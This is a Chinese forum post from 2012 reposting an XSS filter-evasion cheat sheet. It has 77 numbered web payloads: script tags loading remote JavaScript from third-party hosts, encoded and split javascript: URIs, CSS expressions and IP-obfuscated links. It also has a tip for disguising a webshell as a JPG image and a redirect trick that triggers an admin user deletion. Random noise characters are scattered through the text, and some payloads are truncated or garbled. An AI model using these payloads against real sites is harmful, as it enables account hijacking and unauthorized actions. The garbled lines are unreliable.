跨站图片shell' K+ g0 s/ _1 |, |$ K
XSS跨站代码 <script>alert("")</script>
9 Z7 H# B* N8 T: Z0 _+ L
, B9 i$ c4 z) @0 m$ D# w, I将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
& n, K; b- S& j8 N6 u# h
C) Y" D8 x% s: t/ k+ y( {
: |3 O( R5 U# T1 j1 Z0 R0 F- V x! Z
1)普通的XSS JavaScript注入" x7 c, \) E v) ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> R% X. n" U0 [/ ? S& d2 n
9 V7 ^4 R" d% ^$ ]) @. R8 I(2)IMG标签XSS使用JavaScript命令
- k2 z! e5 e" ~, Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ L' _; j' I2 l; d5 |- `) K- B
\/ u, T* K9 P' d" c# T, [8 c$ |6 V(3)IMG标签无分号无引号
% ~. e' p X, l- Z \7 |2 u& f R" {<IMG SRC=javascript:alert(‘XSS’)>6 `' a7 Q( z( j/ v, e$ S1 _1 |
; ]% H* h+ L* h3 l+ l& l3 D
(4)IMG标签大小写不敏感
5 R8 a+ ~: [7 }7 A2 ~1 F/ j4 N<IMG SRC=JaVaScRiPt:alert(‘XSS’)>. w) O. v% g. N( C
1 N4 S ~, b( @( U5 F(5)HTML编码(必须有分号)0 W1 |% X& f6 L' Q; f3 Y. o
<IMG SRC=javascript:alert(“XSS”)>' U4 }3 M7 E4 E( h
" Q, g, ~0 n6 E {( l- X(6)修正缺陷IMG标签
" W3 r4 V4 O! I. {1 ~2 B: S& |# j<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* `8 Y0 e/ M0 n2 ~+ f) P$ U7 _
! P3 w* u* q; F5 w9 O9 E* d(7)formCharCode标签(计算器): @" K9 f5 r: H0 Z6 W/ n5 n. p/ U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>$ T* U2 G' b" S8 K8 r3 e
, L3 W# {) s' N- K. @
(8)UTF-8的Unicode编码(计算器)
& e9 a4 I" m" _: c' R, s<IMG SRC=jav..省略..S')>
! m& |7 a7 e$ M- U5 K
3 n( `; n1 O+ _6 w3 o(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 D4 ]4 T$ }6 J8 l& Q<IMG SRC=jav..省略..S')>' }* i! N/ j$ B4 n4 {' u) n+ o% Q2 `
4 v: P' i# [2 ]$ m(10)十六进制编码也是没有分号(计算器)" s* r2 l F) w
<IMG SRC=java..省略..XSS')>
/ _/ y! \$ N+ d, c* Z" P
9 [' N$ D$ N# b- C& q5 M0 F(11)嵌入式标签,将Javascript分开
: X, o3 o5 z2 o4 I( H5 G<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 L- g7 Y7 t8 }% f1 ]
3 s- X9 X3 b5 a8 N# e(12)嵌入式编码标签,将Javascript分开, f, C! N; Z- Z6 Z6 }( z) v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, b) p/ ?1 e" b! K" T4 l3 L; L! l1 [- u- |! l( n
(13)嵌入式换行符
; p% ~5 M$ \0 |, w8 {; b3 R/ Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
) H0 X, M# G& a9 ~+ \# K* d) h9 Y& ?
(14)嵌入式回车
+ b- J# `2 Q2 e0 D. w! j4 k4 r<IMG SRC=”jav ascript:alert(‘XSS’);”>: h5 y" w- X& X1 M W. ?
) K$ o& A8 t( _( Q; k# q' q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& F/ P& s) B, H o<IMG SRC=”javascript:alert(‘XSS‘)”>
# t! l- C, s3 K: }: t2 m. H8 u# a( b z8 `- l. Y3 Y
(16)解决限制字符(要求同页面)
- ?0 `5 V. V) k<script>z=’document.’</script>
) E$ d, c( I) [<script>z=z+’write(“‘</script>
; N; ]0 }2 n7 g. Q o<script>z=z+’<script’</script>
6 R( I" I! L. ?1 z<script>z=z+’ src=ht’</script>
2 c5 Y& q3 o! W% c<script>z=z+’tp://ww’</script>. q; |( i4 A, P/ M7 t
<script>z=z+’w.shell’</script>
' n; D: I ^/ v! o& T- w5 `<script>z=z+’.net/1.’</script>
: s$ m% F2 Y" G/ Z: A8 d+ c$ l<script>z=z+’js></sc’</script>4 z5 o! Q9 Y! q* O
<script>z=z+’ript>”)’</script>
1 ~% R$ ^ w2 g8 Y, f<script>eval_r(z)</script>
: ?1 M" _$ D# N% n6 @- g9 X3 Q! L" j! J1 M
(17)空字符5 C1 O' e* U# c8 |; H
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 a; b' O/ i- A5 O8 M/ q5 w# ?6 t+ p8 @: P: k. |! e) P7 {6 i+ s
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* Z/ [3 f" K5 G4 q% W% U+ q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* N2 @1 S/ p- ^* y7 K
& K) K( G7 H/ j) Q) H; l; R- T
(19)Spaces和meta前的IMG标签
' R% K; g7 z* B1 F, x3 G<IMG SRC=” javascript:alert(‘XSS’);”>
9 q' J: p/ m3 e, o6 W) C9 I1 B, ~2 m3 e- [
(20)Non-alpha-non-digit XSS4 n% w5 N9 }. W7 d9 ]7 c" h
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 U0 Q2 e7 M1 o3 _! N
/ q5 Z' D& U4 Z% I
(21)Non-alpha-non-digit XSS to 22 j4 o0 A2 f: x$ C# y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( X. ~. m' b/ T/ H& A; t1 h8 `8 Y% n; `% l. K5 M, U
(22)Non-alpha-non-digit XSS to 3* @5 h+ ?, R3 ?
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ J( H+ t* n0 @7 }2 g$ E( {2 s1 z. \% d8 P
(23)双开括号
1 _. ~+ ~% m8 H5 ~0 c1 n; w<<SCRIPT>alert(“XSS”);//<</SCRIPT> L4 U1 U; Q# E# [6 Z5 s
9 g7 p4 n, I. c2 {5 P2 s& g6 W( c
(24)无结束脚本标记(仅火狐等浏览器)4 X h7 q# R8 J. g9 Q" {
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: V. x" w! N; J: x5 `& c
, b `3 v: X. E2 }0 v(25)无结束脚本标记29 }/ a* C) _+ \
<SCRIPT SRC=//3w.org/XSS/xss.js>2 s" d" S4 I3 B% P5 U J
9 Y0 _9 W0 w1 j- S( h" X
(26)半开的HTML/JavaScript XSS! L6 s' C' h3 }
<IMG SRC=”javascript:alert(‘XSS’)”
6 |/ {/ K9 ]/ ~1 n1 q& O4 H! Y" j- \+ T
(27)双开角括号) P; P7 I5 x# _5 t
<iframe src=http://3w.org/XSS.html <0 m6 n$ W0 [& G
0 }- d8 \4 ?9 L: z9 p3 I- K1 Y
(28)无单引号 双引号 分号
% X/ ^! p( |2 I. U* L<SCRIPT>a=/XSS/
, A/ D# I$ H5 valert(a.source)</SCRIPT>! u) M( [% C. o- o* m
5 }+ v: F( [0 X3 Q(29)换码过滤的JavaScript
) _/ ], J4 u% u2 X$ a\”;alert(‘XSS’);//- t& i% `! A& q; ?) {2 D: Z$ z
" P% o5 M/ y1 V _- b+ z3 l/ l9 }(30)结束Title标签
& J* Q, U7 K! ?% C0 @</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' u: s- A) a8 b" z( P
+ [: x3 N: |; b) h(31)Input Image( K8 j, [ |* s( x. {
<INPUT SRC=”javascript:alert(‘XSS’);”>
5 L9 N' O- L6 s+ \ ~
4 K& B% h- J ?' Z7 G9 {(32)BODY Image' j) ~: e) a: V. d+ |: ^
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( J. _* I/ Y0 [/ |: d# [, B7 k
; v1 B# {0 H, H(33)BODY标签! a$ V0 ^* |5 E8 w, q( P9 _
<BODY(‘XSS’)>
9 T, d% V5 w: j0 _
U6 c+ A9 `$ ~5 F" B4 K/ l; ]8 g(34)IMG Dynsrc; s" `3 c% y9 m- S7 B' y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! i" e3 p- y5 q W6 K1 K O) B
' R4 i, l( L( z) U/ d# a% C(35)IMG Lowsrc+ k' K$ o$ ?, u- z6 Z6 K
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# I2 H, M+ U& m+ z( b
`7 V' E8 q' w2 r3 ?8 u+ d(36)BGSOUND
" G' A3 E# Q7 Q$ t0 |$ Z<BGSOUND SRC=”javascript:alert(‘XSS’);”># ]' Z2 {; a9 U# O( ^# @' l; X) k
+ J* g- l7 S+ A# y$ D
(37)STYLE sheet
8 N1 }; @0 @) Y8 d, {<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 S9 \/ B2 O# w# l: a# M+ D- h- ^& _% y+ s* l) C
(38)远程样式表' p/ H& G6 ^4 r) C3 E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! m# q% d& M0 [: j! ~
& o9 ]; C1 W2 \$ j, c(39)List-style-image(列表式)" C6 r) i! J/ S- M5 q: w2 L0 o
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" M5 K9 ]/ D0 J2 _% i5 v2 X" B7 }) m: i4 U( H* [" S/ T
(40)IMG VBscript- O( H, A' ?" Z: a. ]3 ?
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: s# k. D! V9 H9 K# b, y1 h4 E* x. t0 w! q9 ^
(41)META链接url1 C0 t' i( {9 C
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 x2 K" |( Z# z$ I( P" B$ n" t
, T6 M: I" J) l; ^$ ^2 {2 z(42)Iframe
$ w B# x; `# r; \5 l! j, W! L' x9 S<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- ]+ q7 U! j3 n# q9 I$ B! w
(43)Frame( ]4 f2 ?: `: |& t% b
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
0 `& o* F3 H$ _ c$ ]+ j: R) h' P- o. a4 o
(44)Table
2 X: a- j' T) s: C: X0 O7 s7 J<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> O, l# j9 ^. ]8 s
' a6 C9 R/ W% D& `* c& V
(45)TD* ^# R8 l1 _* `
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
: v* z; }, x: T4 N8 T+ _6 o- q: n& M$ T8 }- Q
(46)DIV background-image2 v( R' k7 ]9 T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 b+ t9 L8 t2 F" j" x6 h
8 D5 L g; ^5 v* N4 O* E(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
; y! |) `8 {. @<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>( Y3 e2 @: l& K4 S! Y
D1 u5 a2 }% [) E
(48)DIV expression( B; b5 _* x5 M9 D; I
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 D2 p8 J5 O2 u: V+ F' |
0 e% q. m4 t3 Z: {0 `/ E
(49)STYLE属性分拆表达6 d; r+ p& V4 o9 X
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 O. z. m3 \$ W- q' x
5 H* L- k- g' S7 S% ]- d4 f
(50)匿名STYLE(组成:开角号和一个字母开头)# z" V& [3 l% ^9 }1 q$ ~
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: j$ _/ e2 g. _, {1 S: R4 {" ?$ L8 m" U
(51)STYLE background-image9 |9 o8 [; x' X: [- D0 U5 M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. d; q6 L# q$ {1 w
$ z- [: @" Z8 p q* g1 ^
(52)IMG STYLE方式* ~8 N! M/ F4 q' }2 z
exppression(alert(“XSS”))’>1 y1 _6 c6 X) P! e0 J( `7 M7 M- z- t
+ |; t$ U, b4 C
(53)STYLE background
7 j/ E9 c$ a0 u l<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- m" t q/ X4 o Z
: c! m9 O+ |! _, E* C& z- G
(54)BASE. H7 Q+ ]2 A' h5 B* c
<BASE HREF=”javascript:alert(‘XSS’);//”>9 _0 y, [% y' l$ O6 h: K
6 X5 w. Y% z# O. O1 w% J
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 y2 R/ f/ x8 [2 G% H<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
- W _% c' Z4 m1 M$ ~+ t; P3 ]; b" L% c8 e+ q* O
(56)在flash中使用ActionScrpt可以混进你XSS的代码* k' w" y# o2 v7 ]% a+ M
a=”get”;; l7 Z# L+ u1 u" E
b=”URL(\”";% h* P1 I# m# C, F+ ]; Z7 `$ ?
c=”javascript:”;
" M. _& l0 M0 xd=”alert(‘XSS’);\”)”;
O9 Z- @" ?2 k) Aeval_r(a+b+c+d);+ U3 e! G2 u/ d. ^6 v8 D' g
6 K% |: A" y9 [2 v' |1 N(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: v0 W% u- b& J" ^. W
<HTML xmlns:xss>4 Q& p* V; J' v6 L, F* G
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! Y2 J$ I' |5 H) ~4 p<xss:xss>XSS</xss:xss>5 p6 |8 s, ~7 O7 P; B1 [
</HTML>
+ @2 J% s6 h5 [( v9 T8 i7 l/ w! ]* T1 F6 \0 Z4 ?" W& A% N0 y1 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用/ ?& z/ l+ o5 ?& y! E3 d
<SCRIPT SRC=””></SCRIPT>
; R# |/ g. a5 n5 t0 d
+ n9 {4 Y$ ~ D5 x' I; u(59)IMG嵌入式命令,可执行任意命令3 a" h/ }: V/ G* ~0 I( w8 t
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
0 H e+ u; Y% o7 I3 Z! h
. J) i: @( Z9 d3 U/ d(60)IMG嵌入式命令(a.jpg在同服务器)% T1 y6 a( J+ g9 G; l! d% x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. i' h' S' H. w8 G2 i2 c
+ w( {+ m! x+ j+ h# y
(61)绕符号过滤
+ H2 A1 }6 u) t* G# G<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 ^3 E4 p8 h" S; L7 I
& D0 y1 {- y: m% [8 f4 d
(62)
6 F6 L3 L: r# H# `- T<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# O- m) [( ^3 K, r7 s6 O0 s
3 E5 O8 O7 u- u, s5 z" x# O6 v! l(63). e! i( f! O! V) R, \0 `% I) D9 O
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" }# K4 G$ }4 o5 n D1 i( T* ?. w
, J5 g/ E5 j! a7 w(64)) ]! k4 a' u! h* C4 Y
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 v$ ~$ i; |) A. M7 W
: M+ u$ T6 ?( y
(65)
" a; W; K9 U$ J, C4 E: r3 n<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 i3 W8 c1 a" l
, K1 B$ o9 F/ `' w3 a1 f
(66)
8 `) g1 I: A, o6 k" H, ]6 ?( Z<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. a) |2 Z# W' r7 J- a; C
1 j- U% x- u5 ]# U/ O( X# \! m(67): O2 s# ^, e, T$ V+ a9 x+ ]' W/ D
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 Y4 K6 B" i- C0 O
0 n2 {( g% I3 B; {0 J7 I) m( c q3 r# b# L(68)URL绕行# l" d8 U7 p5 C/ P' [
<A HREF=”http://127.0.0.1/”>XSS</A>
( ^* J: ^9 s' z- W5 k% M5 }) L& Q9 L
(69)URL编码# i: l* k9 z g6 v; M
<A HREF=”http://3w.org”>XSS</A>
; i/ `$ I2 O/ d6 p3 y- L% m |- u8 r q& W# R
(70)IP十进制
, x. e8 m1 G6 M) \) f: D- @<A HREF=”http://3232235521″>XSS</A>8 t; N' o# q4 }0 E, L' @& G4 \$ d
0 ]. z4 X! [" j, F7 E! {0 q/ N(71)IP十六进制) W/ S0 }& o& }, i& j0 y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* j" l- x( b0 B- ~+ s9 i ~: _; } m4 {+ U# H
(72)IP八进制9 C' C' ]. v! Q. C( j' E7 \/ l$ j% ^& X
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* j7 |! Y. R! f
! k8 ~! _7 l$ d; l% j(73)混合编码
. A9 x0 J0 G2 Z( e% u9 T<A HREF=”h
' m' f# ]9 U7 p2 p; ktt p://6 6.000146.0×7.147/”">XSS</A>3 f( m/ c2 s7 O q+ m8 n1 z1 R
6 Q: {# N: D; Q5 ?# s
(74)节省[http:]. G K4 I) k9 t( y% ?9 P# G
<A HREF=”//www.google.com/”>XSS</A>3 g; F1 @# _# U% |0 \- T
5 L' C6 v; B7 @3 z0 u/ }- w$ S
(75)节省[www]
9 e( U6 r5 X, {7 g( E, P- O. P<A HREF=”http://google.com/”>XSS</A>
; w$ X3 y& u) j- j' _. A, \* W' _
# m$ l+ ] j# X(76)绝对点绝对DNS
8 n/ y3 e, [" P. o9 l<A HREF=”http://www.google.com./”>XSS</A>- H4 I" y, E$ J# z, P
& q. R, b4 ~! p& }6 a& t& @
(77)javascript链接/ n- T& q& m% E- F" {8 Q- ]% _
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
2 l; @! _, J' _, y |
发表于 2012-9-13 17:04:56
收藏
支持
反对